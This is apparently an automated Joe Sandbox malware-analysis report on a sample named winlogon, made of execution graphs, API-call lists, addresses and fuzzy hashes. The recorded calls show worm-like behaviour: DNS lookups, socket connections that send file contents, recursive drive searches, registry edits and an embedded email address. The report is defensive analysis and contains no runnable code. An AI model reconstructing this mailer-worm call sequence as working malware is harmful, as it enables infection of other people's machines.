                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                                                                                                                            • Opcode ID: c081bf661c354abefa7763bfaee9c21e390ceceb934d95a70fe9e7886496f980
                                                                                                                                                                                                            • Instruction ID: 89ad30dfa35e05781fa7074c5eb3ee28ffe96362e3dd6f032609885112832f97
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c081bf661c354abefa7763bfaee9c21e390ceceb934d95a70fe9e7886496f980
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45416931100A9C9EEB168724CD49BFB3FE8DB06700F1404FAD549EB1D2C6794A48DFAA
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:7.4%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:426
                                                                                                                                                                                                            Total number of Limit Nodes:3
                                                                                                                                                                                                            execution_graph 2312 403e11 2313 403e1d GetCurrentProcess TerminateProcess 2312->2313 2316 403e2e 2312->2316 2313->2316 2314 403ea8 2315 403e98 ExitProcess 2316->2314 2316->2315 2644 401e62 2645 401e6f 2644->2645 2646 401e99 2645->2646 2648 401e9b lstrcpy 2645->2648 2647 402785 2646->2647 2702 40156c GlobalAlloc GetNetworkParams 2646->2702 2648->2646 2650 401ec6 2650->2647 2651 401ed1 lstrcpy 2650->2651 2716 4037c5 2651->2716 2654 401f00 2655 401f1d htons socket setsockopt setsockopt connect 2654->2655 2656 401f87 2655->2656 2658 401f8e 2655->2658 2657 402778 closesocket 2656->2657 2657->2647 2719 401d9b 2658->2719 2660 402757 2661 40276a shutdown 2660->2661 2662 40379b 2 API calls 2660->2662 2661->2657 2663 402769 2662->2663 2663->2661 2664 401fea 2664->2660 2665 401d9b 2 API calls 2664->2665 2666 40204a 2665->2666 2667 401d9b 2 API calls 2666->2667 2668 402099 2666->2668 2667->2668 2668->2660 2669 401d9b 2 API calls 2668->2669 2670 4020ef 2669->2670 2670->2660 2671 401d9b 2 API calls 2670->2671 2672 402142 2671->2672 2672->2660 2673 401d9b 2 API calls 2672->2673 2675 402179 2673->2675 2674 40220d GetWindowsDirectoryA 2676 40222c 2674->2676 2675->2660 2675->2674 2678 4022fe 2675->2678 2725 4017ad 2676->2725 2741 401b67 GetLocalTime GetTimeZoneInformation 2678->2741 2680 402432 2681 402467 send 2680->2681 2682 402480 2681->2682 2683 40248c wsprintfA 2682->2683 2684 4024b8 2683->2684 2685 402522 send 2684->2685 2686 402541 2685->2686 2687 402596 send 2686->2687 2688 4025a9 2687->2688 2689 4025c0 send 2688->2689 2690 4025d9 2689->2690 2691 402658 send _lopen 2690->2691 2691->2660 2692 402680 2691->2692 2744 401cb2 2692->2744 2695 402697 _lclose 2696 4026a4 2695->2696 2698 4026b0 2695->2698 2750 40379b DeleteFileA 2696->2750 2699 401d9b 2 API calls 2698->2699 2700 40271a 2699->2700 2700->2660 2701 402749 send 2700->2701 2701->2660 2703 4015c5 GetNetworkParams 2702->2703 2704 4015b5 GlobalAlloc 2702->2704 2705 4015d3 2703->2705 2711 401624 2703->2711 2704->2703 2753 4010a4 2705->2753 2708 4015ed 2709 40165c 2708->2709 2708->2711 2712 4010a4 15 API calls 2708->2712 2713 40168d 2709->2713 2771 401335 htons htons htons 2709->2771 2710 4010a4 15 API calls 2710->2711 2711->2709 2711->2710 2712->2708 2713->2650 2715 40168a 2715->2650 2717 403d1e 4 API calls 2716->2717 2718 401ee8 gethostbyname 2717->2718 2718->2647 2718->2654 2720 401dad 2719->2720 2724 401dcf 2719->2724 2722 401db7 send 2720->2722 2721 401deb recv 2723 401e56 2721->2723 2721->2724 2722->2723 2722->2724 2723->2664 2724->2721 2724->2723 2727 4017d7 2725->2727 2726 4019ce 2726->2678 2727->2726 2791 4019e8 GetSystemTime 2727->2791 2731 40187e GetFileSize GetFileSize 2732 4018b0 WriteFile 2731->2732 2733 4018e1 WriteFile 2732->2733 2734 4018ef SetFilePointer 2733->2734 2735 401901 ReadFile 2734->2735 2736 401922 2735->2736 2737 401943 WriteFile 2735->2737 2736->2737 2738 401927 WriteFile 2736->2738 2739 40197b WriteFile 2737->2739 2738->2735 2740 401989 WriteFile 2739->2740 2740->2726 2742 401c1e wsprintfA 2741->2742 2742->2680 2746 401cc5 2744->2746 2745 401cca _hread 2745->2746 2746->2745 2747 401d44 send 2746->2747 2748 401d0b send 2746->2748 2749 401d66 2746->2749 2747->2746 2747->2749 2748->2746 2748->2749 2749->2660 2749->2695 2751 4037a9 GetLastError 2750->2751 2752 4037b1 2750->2752 2751->2752 2752->2698 2754 4010db 2753->2754 2755 4010f0 htons 2754->2755 2756 4010f5 getservbyname 2754->2756 2759 401113 inet_addr 2755->2759 2756->2755 2758 401109 2756->2758 2758->2759 2760 401128 gethostbyname 2759->2760 2761 40113f socket 2759->2761 2762 401135 2760->2762 2765 401152 2760->2765 2763 40115e htons htons 2761->2763 2761->2765 2762->2761 2786 401000 2763->2786 2765->2708 2767 401225 recvfrom 2768 401243 WSAGetLastError 2767->2768 2769 401220 closesocket 2767->2769 2768->2769 2769->2765 2772 40139e 2771->2772 2773 401404 htons 2772->2773 2774 401419 2773->2774 2775 40142b htons 2773->2775 2774->2775 2776 40141e htons 2774->2776 2777 401437 2775->2777 2780 401447 2775->2780 2776->2775 2788 401268 2777->2788 2779 401458 htons 2781 4014ff htons 2779->2781 2784 40143f 2779->2784 2780->2715 2782 401514 inet_ntoa 2781->2782 2781->2784 2782->2784 2783 401541 htons 2783->2784 2784->2779 2784->2780 2784->2783 2785 4014cb htons 2784->2785 2785->2784 2787 401016 htons htons setsockopt setsockopt sendto 2786->2787 2787->2767 2787->2769 2789 4032d8 5 API calls 2788->2789 2790 40127c 2789->2790 2790->2784 2790->2790 2792 401866 2791->2792 2793 401a6d SetFilePointer 2792->2793 2794 401aa8 ReadFile 2793->2794 2795 401ae0 SetFilePointer 2794->2795 2796 401aae 2794->2796 2795->2731 2796->2794 2796->2795 2317 403b04 GetVersion 2339 404683 HeapCreate 2317->2339 2319 403b63 2320 403b6f 2319->2320 2419 403c1f 2319->2419 2346 4044d8 2320->2346 2325 403b88 2379 404159 2325->2379 2327 403b92 2387 4040a0 2327->2387 2329 403b97 2400 404048 2329->2400 2331 403bae GetModuleHandleA 2404 4030f9 GetTickCount 2331->2404 2340 4046a3 2339->2340 2341 4046b8 2339->2341 2432 404a37 RtlAllocateHeap 2340->2432 2341->2319 2344 4046bb 2344->2319 2345 4046ac HeapDestroy 2345->2341 2434 403c43 2346->2434 2350 404608 2351 40462f GetStdHandle 2350->2351 2352 403b78 GetCommandLineA 2350->2352 2351->2350 2354 40463d GetFileType 2351->2354 2358 4043a6 2352->2358 2353 4044f7 2353->2350 2355 403c43 5 API calls 2353->2355 2357 4045b4 2353->2357 2354->2350 2355->2353 2356 4045d6 GetFileType 2356->2357 2357->2350 2357->2356 2359 4043c1 GetEnvironmentStringsW 2358->2359 2360 4043f4 2358->2360 2361 4043d5 GetEnvironmentStrings 2359->2361 2362 4043c9 2359->2362 2360->2362 2363 4043e5 2360->2363 2361->2363 2364 4044ae 2361->2364 2365 404401 GetEnvironmentStringsW 2362->2365 2366 40440d WideCharToMultiByte 2362->2366 2363->2364 2368 404493 2363->2368 2369 404487 GetEnvironmentStrings 2363->2369 2364->2325 2365->2364 2365->2366 2370 404441 2366->2370 2371 404473 FreeEnvironmentStringsW 2366->2371 2372 403c43 5 API calls 2368->2372 2369->2364 2369->2368 2373 403c43 5 API calls 2370->2373 2371->2364 2372->2364 2374 404447 2373->2374 2374->2371 2375 404450 WideCharToMultiByte 2374->2375 2376 404461 2375->2376 2377 40446a 2375->2377 2487 403d1e 2376->2487 2377->2371 2380 40416b 2379->2380 2382 404170 2379->2382 2500 4057cf 2380->2500 2383 403c43 5 API calls 2382->2383 2384 4041b4 2383->2384 2385 4041c4 2384->2385 2386 403bfa 6 API calls 2384->2386 2385->2327 2386->2385 2388 4040ad 2387->2388 2390 4040b2 2387->2390 2389 4057cf 18 API calls 2388->2389 2389->2390 2391 403c43 5 API calls 2390->2391 2392 4040df 2391->2392 2393 403bfa 6 API calls 2392->2393 2398 4040f3 2392->2398 2393->2398 2394 403d1e 4 API calls 2395 404142 2394->2395 2395->2329 2396 403c43 5 API calls 2396->2398 2397 404136 2397->2394 2398->2396 2398->2397 2399 403bfa 6 API calls 2398->2399 2399->2398 2401 404051 2400->2401 2403 404056 2400->2403 2402 4057cf 18 API calls 2401->2402 2402->2403 2403->2331 2552 401d91 2404->2552 2406 403111 CreateMutexA GetLastError 2407 403134 2406->2407 2408 40313d WSAStartup 2406->2408 2425 403def 2407->2425 2553 402ea0 2408->2553 2410 403162 2593 4032d8 2410->2593 2412 403179 2413 40318d CreateThread CreateThread 2412->2413 2415 4031ba 2413->2415 2601 402e37 GetCurrentThread SetThreadPriority 2413->2601 2414 4031c2 InternetGetConnectedState 2414->2415 2415->2414 2416 40324a InternetGetConnectedState 2415->2416 2417 4031f7 GetExitCodeThread 2415->2417 2418 40321a CreateThread 2415->2418 2416->2415 2417->2415 2417->2418 2418->2415 2420 403c28 2419->2420 2421 403c2d 2419->2421 2422 404890 6 API calls 2420->2422 2423 4048c9 6 API calls 2421->2423 2422->2421 2424 403c36 2423->2424 2424->2320 2623 403e11 2425->2623 2428 403ec4 2429 403ed0 2428->2429 2430 403ff9 UnhandledExceptionFilter 2429->2430 2431 403bec 2429->2431 2430->2431 2433 4046a8 2432->2433 2433->2344 2433->2345 2443 403c55 2434->2443 2437 403bfa 2438 403c03 2437->2438 2439 403c08 2437->2439 2469 404890 2438->2469 2475 4048c9 2439->2475 2444 403c52 2443->2444 2446 403c5c 2443->2446 2444->2353 2444->2437 2446->2444 2447 403c81 2446->2447 2448 403c8e 2447->2448 2451 403c94 2447->2451 2453 404dcb 2448->2453 2450 403ca0 RtlAllocateHeap 2452 403cb5 2450->2452 2451->2450 2451->2452 2452->2446 2457 404dfd 2453->2457 2454 404e9c 2456 404eab 2454->2456 2465 405185 2454->2465 2456->2451 2457->2454 2457->2456 2459 4050d4 2457->2459 2460 405117 RtlAllocateHeap 2459->2460 2461 4050e7 2459->2461 2462 405167 2460->2462 2463 40513d VirtualAlloc 2460->2463 2461->2460 2461->2462 2462->2454 2463->2462 2464 405157 HeapFree 2463->2464 2464->2462 2466 405197 VirtualAlloc 2465->2466 2468 4051e0 2466->2468 2468->2456 2470 40489a 2469->2470 2471 4048c7 2470->2471 2472 4048c9 6 API calls 2470->2472 2471->2439 2473 4048b1 2472->2473 2474 4048c9 6 API calls 2473->2474 2474->2471 2477 4048dc 2475->2477 2476 4049f3 2478 404a06 GetStdHandle WriteFile 2476->2478 2477->2476 2479 40491c 2477->2479 2481 403c11 2477->2481 2478->2481 2479->2481 2482 4057eb 2479->2482 2481->2353 2483 4057f8 LoadLibraryA 2482->2483 2485 40583a 2482->2485 2484 405809 GetProcAddress 2483->2484 2483->2485 2484->2485 2486 405820 GetProcAddress GetProcAddress 2484->2486 2485->2481 2486->2485 2488 403d27 2487->2488 2489 403d4b 2487->2489 2490 403d33 2488->2490 2491 403d3d HeapFree 2488->2491 2489->2377 2494 404aa0 2490->2494 2491->2489 2493 403d39 2493->2377 2495 404ae7 2494->2495 2496 404cd9 VirtualFree 2495->2496 2499 404d93 2495->2499 2497 404d3d 2496->2497 2498 404d4c VirtualFree HeapFree 2497->2498 2497->2499 2498->2499 2499->2493 2501 4057d8 2500->2501 2502 4057df 2500->2502 2504 40540b 2501->2504 2502->2382 2511 4055a4 2504->2511 2506 405598 2506->2502 2508 405462 2508->2506 2514 40564a GetCPInfo 2508->2514 2509 40544e GetCPInfo 2509->2508 2512 40541c 2511->2512 2513 4055b4 GetOEMCP 2511->2513 2512->2506 2512->2508 2512->2509 2513->2512 2515 405735 2514->2515 2516 40566d 2514->2516 2515->2506 2522 405280 2516->2522 2521 405bb5 9 API calls 2521->2515 2523 4052b1 GetStringTypeW 2522->2523 2526 4052c9 2522->2526 2523->2526 2527 4052cd GetStringTypeA 2523->2527 2524 4052f4 GetStringTypeA 2529 4053b5 2524->2529 2525 405318 2525->2529 2530 40532e MultiByteToWideChar 2525->2530 2526->2524 2526->2525 2527->2526 2527->2529 2534 405bb5 2529->2534 2530->2529 2531 405352 2530->2531 2531->2529 2532 40538c MultiByteToWideChar 2531->2532 2532->2529 2533 4053a5 GetStringTypeW 2532->2533 2533->2529 2535 405be5 LCMapStringW 2534->2535 2536 405c01 2534->2536 2535->2536 2537 405c09 LCMapStringA 2535->2537 2539 405c67 2536->2539 2540 405c4a LCMapStringA 2536->2540 2537->2536 2538 40570d 2537->2538 2538->2521 2539->2538 2541 405c7d MultiByteToWideChar 2539->2541 2540->2538 2541->2538 2542 405ca7 2541->2542 2542->2538 2543 405cdd MultiByteToWideChar 2542->2543 2543->2538 2544 405cf6 LCMapStringW 2543->2544 2544->2538 2545 405d11 2544->2545 2546 405d17 2545->2546 2548 405d57 2545->2548 2546->2538 2547 405d25 LCMapStringW 2546->2547 2547->2538 2548->2538 2549 405d8f LCMapStringW 2548->2549 2549->2538 2550 405da7 WideCharToMultiByte 2549->2550 2550->2538 2552->2406 2554 402ec2 GetWindowsDirectoryA 2553->2554 2555 402edc 2554->2555 2556 402f33 RegOpenKeyA 2555->2556 2596 403720 2556->2596 2561 402e72 3 API calls 2562 402f94 2561->2562 2563 402e72 3 API calls 2562->2563 2564 402fa0 2563->2564 2565 402e72 3 API calls 2564->2565 2566 402fac 2565->2566 2567 402e72 3 API calls 2566->2567 2568 402fcb 2567->2568 2569 402e72 3 API calls 2568->2569 2570 402fd7 2569->2570 2571 402e72 3 API calls 2570->2571 2572 402fe3 2571->2572 2573 402e72 3 API calls 2572->2573 2574 402ff3 2573->2574 2575 402e72 3 API calls 2574->2575 2576 402fff 2575->2576 2577 402e72 3 API calls 2576->2577 2578 40300b 2577->2578 2579 402e72 3 API calls 2578->2579 2580 40301a 2579->2580 2581 402e72 3 API calls 2580->2581 2582 403026 2581->2582 2583 402e72 3 API calls 2582->2583 2584 403032 2583->2584 2585 402e72 3 API calls 2584->2585 2586 40303e 2585->2586 2587 402e72 3 API calls 2586->2587 2588 40304a 2587->2588 2589 402e72 3 API calls 2588->2589 2590 403071 2589->2590 2591 402e72 3 API calls 2590->2591 2592 40307d 2591->2592 2592->2410 2594 403c55 5 API calls 2593->2594 2595 4032e3 2594->2595 2595->2412 2597 402f57 RegSetValueExA RegCloseKey 2596->2597 2598 402e72 RegOpenKeyA 2597->2598 2599 402e89 RegDeleteValueA RegCloseKey 2598->2599 2600 402e9e 2598->2600 2599->2600 2600->2561 2602 402e4c GetDriveTypeA 2601->2602 2603 402e59 2602->2603 2603->2602 2604 402e6c 2603->2604 2606 402cea 2603->2606 2607 402d03 2606->2607 2608 402d14 FindFirstFileA 2607->2608 2610 402e2d 2608->2610 2612 402d35 2608->2612 2609 402e17 FindNextFileA 2609->2610 2609->2612 2610->2603 2612->2609 2612->2610 2613 402cea 15 API calls 2612->2613 2614 402a51 2612->2614 2613->2612 2616 402a5e 2614->2616 2615 402c53 2615->2612 2616->2615 2617 402ab3 _lopen 2616->2617 2617->2615 2622 402aca 2617->2622 2618 402af4 _hread 2619 402c4a _lclose 2618->2619 2618->2622 2619->2615 2620 4028a4 11 API calls 2620->2622 2621 402c16 _llseek 2621->2622 2622->2618 2622->2620 2622->2621 2624 403e1d GetCurrentProcess TerminateProcess 2623->2624 2627 403e2e 2623->2627 2624->2627 2625 403bdb 2625->2428 2626 403e98 ExitProcess 2627->2625 2627->2626 2628 403085 GetCurrentThread SetThreadPriority 2629 40309a GetLocalTime 2628->2629 2630 4030ab 2629->2630 2630->2629 2631 4030e0 Beep 2630->2631 2631->2630 2632 405cc9 2633 405cd8 2632->2633 2634 405cdd MultiByteToWideChar 2633->2634 2639 405d43 2633->2639 2635 405cf6 LCMapStringW 2634->2635 2634->2639 2636 405d11 2635->2636 2635->2639 2637 405d17 2636->2637 2638 405d57 2636->2638 2637->2639 2640 405d25 LCMapStringW 2637->2640 2638->2639 2641 405d8f LCMapStringW 2638->2641 2640->2639 2641->2639 2642 405da7 WideCharToMultiByte 2641->2642 2642->2639 2807 40537d 2808 405384 2807->2808 2809 4053b5 2808->2809 2810 40538c MultiByteToWideChar 2808->2810 2810->2809 2811 4053a5 GetStringTypeW 2810->2811 2811->2809 2812 405d7d 2813 405d8b 2812->2813 2814 405d43 2813->2814 2815 405d8f LCMapStringW 2813->2815 2815->2814 2816 405da7 WideCharToMultiByte 2815->2816 2816->2814 2797 403bef 2804 403e00 2797->2804 2799 403bfa 2800 403c08 2799->2800 2801 404890 6 API calls 2799->2801 2802 4048c9 6 API calls 2800->2802 2801->2800 2803 403c11 2802->2803 2805 403e11 3 API calls 2804->2805 2806 403e0d 2805->2806 2806->2799

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403105
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 0040311C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00403127
                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00403149
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00402E37,00000000,00000000,?), ref: 004031A9
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00003085,00000000,00000000,?), ref: 004031B8
                                                                                                                                                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004031CA
                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 00403207
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00001E62,0040DDC0,00000000,?), ref: 0040322B
                                                                                                                                                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 0040324F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateThread$ConnectedInternetState$CodeCountErrorExitLastMutexStartupTick
                                                                                                                                                                                                            • String ID: jfkoofia@yahoo.com
                                                                                                                                                                                                            • API String ID: 3592878312-1009674638
                                                                                                                                                                                                            • Opcode ID: 4db236c8f64a66a94e666b966866f959043465874e8551258ceb0bafea335d50
                                                                                                                                                                                                            • Instruction ID: a1bf2ff7ef5bceeac63f91e3b4f6e5b3c95491823722eaf96483bc5270944901
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db236c8f64a66a94e666b966866f959043465874e8551258ceb0bafea335d50
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3418DB1940209AFEB00DFA0DD889AF7BBCEB08349F10447AF546F3291D7785E558B69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00403B2A
                                                                                                                                                                                                              • Part of subcall function 00404683: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403B63,00000000), ref: 00404694
                                                                                                                                                                                                              • Part of subcall function 00404683: HeapDestroy.KERNEL32 ref: 004046B2
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00403B78
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403BC6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$CommandCreateDestroyHandleLineModuleVersion
                                                                                                                                                                                                            • String ID: %n
                                                                                                                                                                                                            • API String ID: 2736944706-2247426890
                                                                                                                                                                                                            • Opcode ID: c1a7a2cec080945146dc668cefc1699e97db2957981a3824a0b34371f317d2c6
                                                                                                                                                                                                            • Instruction ID: d46f6c68c26d4c1b299e5b91e5fb46e43711b55dc765b057d004a842d80414bb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1a7a2cec080945146dc668cefc1699e97db2957981a3824a0b34371f317d2c6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A218EB1944714AADB04AFA6DC06AAE7BB9EF45705F10413EF601BB2D1DB3C4940CB59
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 56 4050d4-4050e5 57 405117-40513b RtlAllocateHeap 56->57 58 4050e7-405104 56->58 59 405167-405169 57->59 60 40513d-405155 VirtualAlloc 57->60 58->59 65 405106-405112 58->65 64 405182-405184 59->64 62 405157-405161 HeapFree 60->62 63 40516b-405180 60->63 62->59 63->64 65->57
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,000041C4,00000013), ref: 00405130
                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,?), ref: 0040514A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 00405161
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocAllocateFreeVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1702295773-0
                                                                                                                                                                                                            • Opcode ID: 85fe7fa33a580cbed554531df588a258a414acce59b53c0c872e434cf99fc004
                                                                                                                                                                                                            • Instruction ID: e0ef3e5d47e0e8a7737a84c02c4b327dd222423e0ed1cb0d0df2e217ac6451dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85fe7fa33a580cbed554531df588a258a414acce59b53c0c872e434cf99fc004
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D113A34601A00AFC7228F19EC45AA77BB6FB857607108A7DE166DB1F1CB719851CF1C
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 66 403e11-403e1b 67 403e1d-403e28 GetCurrentProcess TerminateProcess 66->67 68 403e2e-403e44 66->68 67->68 69 403e82-403e96 call 403eaa 68->69 70 403e46-403e4d 68->70 79 403ea8-403ea9 69->79 80 403e98-403ea2 ExitProcess 69->80 72 403e71-403e81 call 403eaa 70->72 73 403e4f-403e5b 70->73 72->69 75 403e70 73->75 76 403e5d-403e61 73->76 75->72 81 403e63 76->81 82 403e65-403e6e 76->82 81->82 82->75 82->76
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00403BDB,?,00403DFC,00000000,00000000,00000000,00403BDB,00000000), ref: 00403E21
                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00403DFC,00000000,00000000,00000000,00403BDB,00000000), ref: 00403E28
                                                                                                                                                                                                            • ExitProcess.KERNEL32(00403BDB,?,00403DFC,00000000,00000000), ref: 00403EA2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                            • Opcode ID: ae18f8a63550fff8977e70903f57ef0a696ef6a67726d26ab723117cb14069b1
                                                                                                                                                                                                            • Instruction ID: d5f55bf5871efc9d605b963410fb5b019a0973ea18ec65a1aa8bf71409585c38
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae18f8a63550fff8977e70903f57ef0a696ef6a67726d26ab723117cb14069b1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED01F9316443019ADB109F18FE85A5B7FACFB94762B11413FF480761E1CB39A941CAED
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 83 404683-4046a1 HeapCreate 84 4046a3-4046aa call 404a37 83->84 85 4046b8-4046ba 83->85 88 4046bb-4046be 84->88 89 4046ac-4046b2 HeapDestroy 84->89 89->85
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00403B63,00000000), ref: 00404694
                                                                                                                                                                                                              • Part of subcall function 00404A37: RtlAllocateHeap.NTDLL(00000000,00000140,004046A8), ref: 00404A44
                                                                                                                                                                                                            • HeapDestroy.KERNEL32 ref: 004046B2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateCreateDestroy
                                                                                                                                                                                                            • String ID:
